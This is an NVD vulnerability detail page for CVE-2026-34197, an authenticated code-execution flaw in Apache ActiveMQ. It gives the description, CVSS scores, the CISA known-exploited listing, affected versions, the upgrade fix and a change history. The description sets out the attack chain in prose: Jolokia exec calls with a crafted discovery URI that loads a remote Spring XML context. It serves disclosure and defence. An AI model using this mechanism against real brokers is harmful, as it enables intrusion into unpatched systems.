NVD - CVE-2026-34197

NVD - CVE-2026-34197
Vulnerabilities
CVE-2026-34197
Detail
Description
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ.

Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including
BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).

An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext.
Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().

This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3.

Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue
Metrics
NVD enrichment efforts reference publicly available information to associate
vector strings. CVSS information contributed by other sources is also
displayed.
CVSS 4.0 Severity and Vector Strings:
NIST:
NVD
N/A
NVD assessment
not yet provided.
CVSS 3.x Severity and Vector Strings:
NIST:
NVD
Base
Score:
N/A
NVD assessment
not yet provided.
ADP:
CISA-ADP
Base
Score:
8.8 HIGH
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 2.0 Severity and Vector Strings:
NIST:
NVD
Base
Score:
N/A
NVD assessment
not yet provided.
References to Advisories, Solutions, and Tools
By selecting these links, you will be leaving NIST webspace.
We have provided these links to other web sites because they
may have information that would be of interest to you. No
inferences should be drawn on account of other sites being
referenced, or not, from this page. There may be other web
sites that are more appropriate for your purpose. NIST does
not necessarily endorse the views expressed, or concur with
the facts presented on these sites. Further, NIST does not
endorse any commercial products that may be mentioned on
these sites. Please address comments about this page to
[email protected]
URL
Source(s)
Tag(s)
CVE
Mailing List
Third Party Advisory
Apache Software Foundation
Vendor Advisory
CISA-ADP
US Government Resource
This CVE is in CISA's Known Exploited Vulnerabilities Catalog
Reference
CISA's BOD 22-01
and
Known
Exploited Vulnerabilities Catalog
for further guidance and requirements.
Vulnerability Name
Date Added
Due Date
Required Action
Apache ActiveMQ Improper Input Validation Vulnerability
04/16/2026
04/30/2026
Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Weakness Enumeration
CWE-ID
CWE Name
Source
CWE-20
Improper Input Validation
Apache Software Foundation
CWE-94
Improper Control of Generation of Code ('Code Injection')
Apache Software Foundation
Known Affected Software Configurations
Switch
to CPE 2.2
CPEs loading, please wait.
Change History
8 change records found
show changes
Initial Analysis by NIST
4/16/2026 3:59:38 PM
Action
Type
Old Value
New Value
Added
CPE Configuration
OR
*cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* versions up to (excluding) 5.19.4
*cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* versions from (including) 6.0.0 up to (excluding) 6.2.3
*cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:* versions up to (excluding) 5.19.4
*cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:* versions from (including) 6.0.0 up to (excluding) 6.2.3
Added
Reference Type
Apache Software Foundation: https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt Types: Vendor Advisory
Added
Reference Type
CISA-ADP: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34197 Types: US Government Resource
Added
Reference Type
CVE: http://www.openwall.com/lists/oss-security/2026/04/06/3 Types: Mailing List, Third Party Advisory
CVE Modified by CISA-ADP
4/16/2026 3:16:33 PM
Action
Type
Old Value
New Value
Added
Reference
CVE CISA KEV Update by Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government
4/16/2026 3:00:02 PM
Action
Type
Old Value
New Value
Added
Date Added
2026-04-16
Added
Due Date
2026-04-30
Added
Required Action
Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Added
Vulnerability Name
Apache ActiveMQ Improper Input Validation Vulnerability
CVE Modified by Apache Software Foundation
4/08/2026 12:16:25 PM
Action
Type
Old Value
New Value
Changed
Description
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ.

Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including
BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).

An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext.
Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().
This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: .

Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ.

Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including
BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).

An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext.
Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().

This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3.

Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue
CVE Modified by Apache Software Foundation
4/08/2026 5:16:21 AM
Action
Type
Old Value
New Value
Changed
Description
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ.

Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including
BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).

An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext.
Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().
This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: .

Users are recommended to upgrade to version 5.19.5 or 6.2.3, which fixes the issue.
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ.

Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including
BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).

An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext.
Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().
This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: .

Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.
CVE Modified by CISA-ADP
4/07/2026 10:16:22 AM
Action
Type
Old Value
New Value
Added
CVSS V3.1
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE Modified by CVE
4/07/2026 5:16:20 AM
Action
Type
Old Value
New Value
Added
Reference
New CVE Received from Apache Software Foundation
4/07/2026 5:16:20 AM
Action
Type
Old Value
New Value
Added
Description
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ.

Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including
BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).

An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext.
Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().
This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: .

Users are recommended to upgrade to version 5.19.5 or 6.2.3, which fixes the issue.
Added
CWE
CWE-20
Added
CWE
CWE-94
Added
Reference
Quick Info
CVE Dictionary Entry:
CVE-2026-34197
NVD
Published Date:
04/07/2026
NVD
Last Modified:
04/16/2026
Source:
Apache Software Foundation